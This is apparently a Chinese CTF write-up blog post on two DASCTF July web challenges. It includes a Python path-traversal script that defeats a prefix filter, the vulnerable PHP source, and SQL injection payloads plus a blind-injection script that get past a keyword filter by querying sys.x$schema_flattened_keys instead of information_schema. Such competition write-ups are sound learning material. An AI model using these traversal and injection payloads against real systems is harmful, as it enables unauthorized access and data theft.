文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-07-25   702

DASCTF七月赛 Web Writeup

EzFileInclude

考点

  • 文件包含

解题

做的时候这道题真的是。。一言难尽

F12可以看到主页图片的链接http://183.129.189.60:10009/image.php?t=XXXXXX&f=XXXXXXX

参数t是时间戳,参数f是要包含的文件名base64编码,尝试直接读image.phpindex.php都没有任何回显,应该是前面拼接了路径,比如说/var/www/html/img/,而且过滤了../等路径穿越的字符,并且wrapper等手段的。

想了半天感觉这样应该是绝对安全的。。结果后来发现,如果f参数的开头给出一个目录再穿越就可以绕过waf了。

脚本:

1
2
3
4
5
6
7
8
9
10
11
import requests
import time
import base64

URL = 'http://183.129.189.60:10009/image.php'
timestamp = int(time.time())
payload = 'gqy.jpg/../../../../../flag'
params = {'t': timestamp, 'f': base64.b64encode(payload.encode('utf-8'))}

r = requests.get(url=URL, params=params)
print(r.text)

顺便看一下源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php

if(!isset($_GET['t']) || !isset($_GET['f'])){
echo "you miss some parameters";
exit();
}

$timestamp = time();

if(abs($_GET['t'] - $timestamp) > 10){
echo "what's your time?";
exit();
}

$file = base64_decode($_GET['f']);

if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
echo 'You are not allowed to do that.';
}
else{
echo file_get_contents('/var/www/html/img/'.$file);
}

?>

SQLi

考点

  • bypass information_schema

解题

太菜了。。第二题就不会了。

赛后看y1ng师傅的writeup:https://www.gem-love.com/ctf/2514.html

过滤了关键字

1
return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);

sys.x$schema_flattened_keys来绕过information_schema

有回显直接联合注入

1
100%27/**/union/**/SELECT/**/group_concat(table_name),2,3/**/FROM/**//**/sys.x$schema_flattened_keys/**/WHERE/**/table_schema='sqlidb'/**/GROUP/**/BY/**/table_name/**/limit/**/0,1%23

另外也可以盲注,把表名给注出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests as req
import time as t
import base64 as b
import string
alpa = string.ascii_letters + string.digits
res = ''
#库名 利用limit注入 sqlidb
# http://183.129.189.60:10004/?id=1%27limit/**/1,1/**/PROCEDURE/**/ANALYSE(1)%23

#表名 flllaaaggg
payload = '''SELECT group_concat(table_name) FROM sys.x$schema_flattened_keys WHERE table_schema='sqlidb' GROUP BY table_name limit 0,1'''

for i in range(1,100):
for char in alpa:
host = '''http://183.129.189.60:10004/?id=1'=(substr(({payload}),{i},1)='{char}')%23'''.format(payload=payload.replace(' ','/**/'), i=i, char=char)

r = req.get(host)
if r'admin666' in r.text:
res += char
print("found it: "+res)
break
t.sleep(0.2)

再用联合查询获得flag

1
100'/**/union/**/select/**/*,1/**/from/**/flllaaaggg%23

Homebrew Dubbo v2

待填坑。。。

等一手下个星期找老板的直播讲解。

Copyright © ca01h 2019-2020 | 本站总访问量